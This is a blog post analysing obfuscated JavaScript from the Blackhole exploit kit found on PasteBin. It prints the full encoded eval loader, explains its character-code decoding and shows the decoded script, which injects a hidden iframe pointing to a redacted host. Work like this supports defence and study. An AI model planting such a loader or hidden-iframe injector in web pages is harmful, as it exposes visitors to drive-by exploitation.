//
you're reading...
Hacking / Counter Intelligence, Source Code

Blackhole exploit kit PT1: De-obfuscation

While on PasteBin last night I found this interesting bit of javascript posted by scurit at http://pastebin.com/mAkfEzTx

v="va"+"l";try{ebgserb++;}catch(snregrx){try{fbwenrn&&325}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rC"+"ode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&136&&128&&122&&136&&119&&114&&132&&117&&63&&116&&132&&125&&133&&128&&63&&115&&128&&125&&64&&131&&133&&113&&133&&131&&64&&119&&114&&62&&129&&120&&129&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&136&&128&&122&&136&&119&&114&&132&&117&&63&&116&&132&&125&&133&&128&&63&&115&&128&&125&&64&&131&&133&&113&&133&&131&&64&&119&&114&&62&&129&&120&&129&&55&&58&&75&&119&&62&&132&&132&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-585!=0;i=1+i){k=i;if(window.document)s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}

the most interesting piece of code being this

String[ff](n[i]-(020+i%h));
meaning
String.fromCharCode( arrayelement - (20 + (loop index) % 2) )
for example
String.fromCharCode( 121 - (20 + 2 % 2) ) = e

Being that I am curious, I decoded it’s contents.

if (document.getElementsByTagName('body')[0])
{
	iframer();
}
else 
{
	document.write("");
}
function iframer()
{
	var f = document.createElement('iframe');
	f.setAttribute('src','http://<removed>/stats/ga.php');
	f.style.visibility='hidden';
	f.style.position='absolute';
	f.style.left='0';
	f.style.top='0';
	f.setAttribute('width','10');
	f.setAttribute('height','10');
	document.getElementsByTagName('body')[0].appendChild(f);
}
Advertisements

About Pythorian

Exploration and Production oriented security consultant for securing IT infrastructures relating to natural resources.

Discussion

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: